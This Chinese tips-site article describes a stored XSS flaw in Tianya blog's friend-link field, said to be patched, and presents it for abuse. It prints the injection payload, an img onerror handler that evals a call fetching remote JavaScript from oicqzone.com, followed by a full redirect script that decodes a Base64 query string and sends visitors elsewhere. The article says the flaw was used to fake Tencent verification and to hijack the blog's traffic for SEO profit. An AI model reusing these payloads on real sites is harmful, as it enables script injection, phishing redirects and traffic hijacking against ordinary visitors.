首页 > 上网技巧 > 电脑小技巧 > 2014年6月天涯博客友情链接xss漏洞

2014年6月天涯博客友情链接xss漏洞

时间:2015-06-11 08:48 作者:QQ地带 我要评论

该漏洞天涯博客已经在昨天下午修复了。在添加友情链接的时候在地址一栏添加一下代码:

  1. http://'><img//src="#"//onerror='eval("$.get\u0053cript(\u0022//oicqzone.com/test.js?/\u0022)");// 

这里的js大家就可以无限发挥了。这两天网上利用得比较多的有:

一、伪造网站腾讯认证

原理:利用天涯博客参数跳转,js代码:

 

  1. (function(){ 
  2.     var BASE64_MAPPING = [ 
  3.         'A','B','C','D','E','F','G','H'
  4.         'I','J','K','L','M','N','O','P'
  5.         'Q','R','S','T','U','V','W','X'
  6.         'Y','Z','a','b','c','d','e','f'
  7.         'g','h','i','j','k','l','m','n'
  8.         'o','p','q','r','s','t','u','v'
  9.         'w','x','y','z','0','1','2','3'
  10.         '4','5','6','7','8','9','+','/' 
  11.     ]; 
  12.  
  13.     /** 
  14.      *ascii convert to binary 
  15.      */ 
  16.     var _toBinary = function(ascii){ 
  17.         var binary = new Array(); 
  18.         while(ascii > 0){ 
  19.             var b = ascii%2; 
  20.             ascii = Math.floor(ascii/2); 
  21.             binary.push(b); 
  22.         } 
  23.         /* 
  24.         var len = binary.length; 
  25.         if(6-len > 0){ 
  26.             for(var i = 6-len ; i > 0 ; --i){ 
  27.                 binary.push(0); 
  28.             } 
  29.         }*/ 
  30.         binary.reverse(); 
  31.         return binary; 
  32.     }; 
  33.  
  34.     /** 
  35.      *binary convert to decimal 
  36.      */ 
  37.     var _toDecimal  = function(binary){ 
  38.         var dec = 0; 
  39.         var p = 0; 
  40.         for(var i = binary.length-1 ; i >= 0 ; --i){ 
  41.             var b = binary[i]; 
  42.             if(b == 1){ 
  43.                 dec += Math.pow(2 , p); 
  44.             } 
  45.             ++p; 
  46.         } 
  47.         return dec; 
  48.     }; 
  49.  
  50.     /** 
  51.      *unicode convert to utf-8 
  52.      */ 
  53.     var _toUTF8Binary = function(c , binaryArray){ 
  54.         var mustLen = (8-(c+1)) + ((c-1)*6); 
  55.         var fatLen = binaryArray.length; 
  56.         var diff = mustLen - fatLen; 
  57.         while(--diff >= 0){ 
  58.             binaryArray.unshift(0); 
  59.         } 
  60.         var binary = []; 
  61.         var _c = c; 
  62.         while(--_c >= 0){ 
  63.             binary.push(1); 
  64.         } 
  65.         binary.push(0); 
  66.         var i = 0 , len = 8 - (c+1); 
  67.         for(; i < len ; ++i){ 
  68.             binary.push(binaryArray[i]); 
  69.         } 
  70.  
  71.         for(var j = 0 ; j < c-1 ; ++j){ 
  72.             binary.push(1); 
  73.             binary.push(0); 
  74.             var sum = 6; 
  75.             while(--sum >= 0){ 
  76.                 binary.push(binaryArray[i++]); 
  77.             } 
  78.         } 
  79.         return binary; 
  80.     }; 
  81.  
  82.     var __BASE64 = { 
  83.             /** 
  84.              *BASE64 Encode 
  85.              */ 
  86.             encoder:function(str){ 
  87.                 var base64_Index = []; 
  88.                 var binaryArray = []; 
  89.                 for(var i = 0 , len = str.length ; i < len ; ++i){ 
  90.                     var unicode = str.charCodeAt(i); 
  91.                     var _tmpBinary = _toBinary(unicode); 
  92.                     if(unicode < 0x80){ 
  93.                         var _tmpdiff = 8 - _tmpBinary.length; 
  94.                         while(--_tmpdiff >= 0){ 
  95.                             _tmpBinary.unshift(0); 
  96.                         } 
  97.                         binaryArray = binaryArray.concat(_tmpBinary); 
  98.                     }else if(unicode >= 0x80 && unicode <= 0x7FF){ 
  99.                         binaryArray = binaryArray.concat(_toUTF8Binary(2 , _tmpBinary)); 
  100.                     }else if(unicode >= 0x800 && unicode <= 0xFFFF){//UTF-8 3byte 
  101.                         binaryArray = binaryArray.concat(_toUTF8Binary(3 , _tmpBinary)); 
  102.                     }else if(unicode >= 0x10000 && unicode <= 0x1FFFFF){//UTF-8 4byte 
  103.                         binaryArray = binaryArray.concat(_toUTF8Binary(4 , _tmpBinary));     
  104.                     }else if(unicode >= 0x200000 && unicode <= 0x3FFFFFF){//UTF-8 5byte 
  105.                         binaryArray = binaryArray.concat(_toUTF8Binary(5 , _tmpBinary)); 
  106.                     }else if(unicode >= 4000000 && unicode <= 0x7FFFFFFF){//UTF-8 6byte 
  107.                         binaryArray = binaryArray.concat(_toUTF8Binary(6 , _tmpBinary)); 
  108.                     } 
  109.                 } 
  110.  
  111.                 var extra_Zero_Count = 0; 
  112.                 for(var i = 0 , len = binaryArray.length ; i < len ; i+=6){ 
  113.                     var diff = (i+6)-len; 
  114.                     if(diff == 2){ 
  115.                         extra_Zero_Count = 2; 
  116.                     }else if(diff == 4){ 
  117.                         extra_Zero_Count = 4; 
  118.                     } 
  119.                     //if(extra_Zero_Count > 0){ 
  120.                     //  len += extra_Zero_Count+1; 
  121.                     //} 
  122.                     var _tmpExtra_Zero_Count = extra_Zero_Count; 
  123.                     while(--_tmpExtra_Zero_Count >= 0){ 
  124.                         binaryArray.push(0); 
  125.                     } 
  126.                     base64_Index.push(_toDecimal(binaryArray.slice(i , i+6))); 
  127.                 } 
  128.  
  129.                 var base64 = ''
  130.                 for(var i = 0 , len = base64_Index.length ; i < len ; ++i){ 
  131.                     base64 += BASE64_MAPPING[base64_Index[i]]; 
  132.                 } 
  133.  
  134.                 for(var i = 0 , len = extra_Zero_Count/2 ; i < len ; ++i){ 
  135.                     base64 += '='
  136.                 } 
  137.                 return base64; 
  138.             }, 
  139.             /** 
  140.              *BASE64  Decode for UTF-8   转自www.oicqzone.com
  141.              */ 
  142.             decoder : function(_base64Str){ 
  143.                 var _len = _base64Str.length; 
  144.                 var extra_Zero_Count = 0; 
  145.                 /** 
  146.                  *计算在进行BASE64编码的时候,补了几个0 
  147.                  */ 
  148.                 if(_base64Str.charAt(_len-1) == '='){ 
  149.                     //alert(_base64Str.charAt(_len-1)); 
  150.                     //alert(_base64Str.charAt(_len-2)); 
  151.                     if(_base64Str.charAt(_len-2) == '='){//两个等号说明补了4个0 
  152.                         extra_Zero_Count = 4; 
  153.                         _base64Str = _base64Str.substring(0 , _len-2); 
  154.                     }else{//一个等号说明补了2个0 
  155.                         extra_Zero_Count = 2; 
  156.                         _base64Str = _base64Str.substring(0 , _len - 1); 
  157.                     } 
  158.                 } 
  159.  
  160.                 var binaryArray = []; 
  161.                 for(var i = 0 , len = _base64Str.length; i < len ; ++i){ 
  162.                     var c = _base64Str.charAt(i); 
  163.                     for(var j = 0 , size = BASE64_MAPPING.length ; j < size ; ++j){ 
  164.                         if(c == BASE64_MAPPING[j]){ 
  165.                             var _tmp = _toBinary(j); 
  166.                             /*不足6位的补0*/ 
  167.                             var _tmpLen = _tmp.length; 
  168.                             if(6-_tmpLen > 0){ 
  169.                                 for(var k = 6-_tmpLen ; k > 0 ; --k){ 
  170.                                     _tmp.unshift(0); 
  171.                                 } 
  172.                             } 
  173.                             binaryArray = binaryArray.concat(_tmp); 
  174.                             break
  175.                         } 
  176.                     } 
  177.                 } 
  178.  
  179.                 if(extra_Zero_Count > 0){ 
  180.                     binaryArray = binaryArray.slice(0 , binaryArray.length - extra_Zero_Count); 
  181.                 } 
  182.  
  183.                 var unicode = []; 
  184.                 var unicodeBinary = []; 
  185.                 for(var i = 0 , len = binaryArray.length ; i < len ; ){ 
  186.                     if(binaryArray[i] == 0){ 
  187.                         unicode=unicode.concat(_toDecimal(binaryArray.slice(i,i+8))); 
  188.                         i += 8; 
  189.                     }else
  190.                         var sum = 0; 
  191.                         while(i < len){ 
  192.                             if(binaryArray[i] == 1){ 
  193.                                 ++sum; 
  194.                             }else
  195.                                 break
  196.                             } 
  197.                             ++i; 
  198.                         } 
  199.                         unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+1 , i+8-sum)); 
  200.                         i += 8 - sum; 
  201.                         while(sum > 1){ 
  202.                             unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+2 , i+8)); 
  203.                             i += 8; 
  204.                             --sum; 
  205.                         } 
  206.                         unicode = unicode.concat(_toDecimal(unicodeBinary)); 
  207.                         unicodeBinary = []; 
  208.                     } 
  209.                 } 
  210.                 return unicode; 
  211.             } 
  212.     }; 
  213.  
  214.     window.BASE64 = __BASE64; 
  215. })(); 
  216.  
  217.   
  218. var url = location.search; 
  219. if (url.indexOf("?") != -1){  
  220. var str = url.substr(1); 
  221. var unicode= BASE64.decoder(str) 
  222. str = ''
  223. for(var i = 0 , len =  unicode.length ; i < len ;++i){   
  224.       str += String.fromCharCode(unicode[i]);   
  225. window.location.href="http://"+str; 
  226. //document.getElementsByTrgName("body")[0].innerHTML="<iframe src='http://"+str+"'height='100%'width='100%'></iframe>" 

 

二、利用天涯博客自身权重,做关键词排名。

原理:在js里直接添加跳转链接,这样博客获得的流量会自动跳转到你的相关页面,这里大家都懂的吧。各种利益。

 

 


标签: xss
顶一下
(3)
100%
踩一下
(0)
0%

Google提供的广告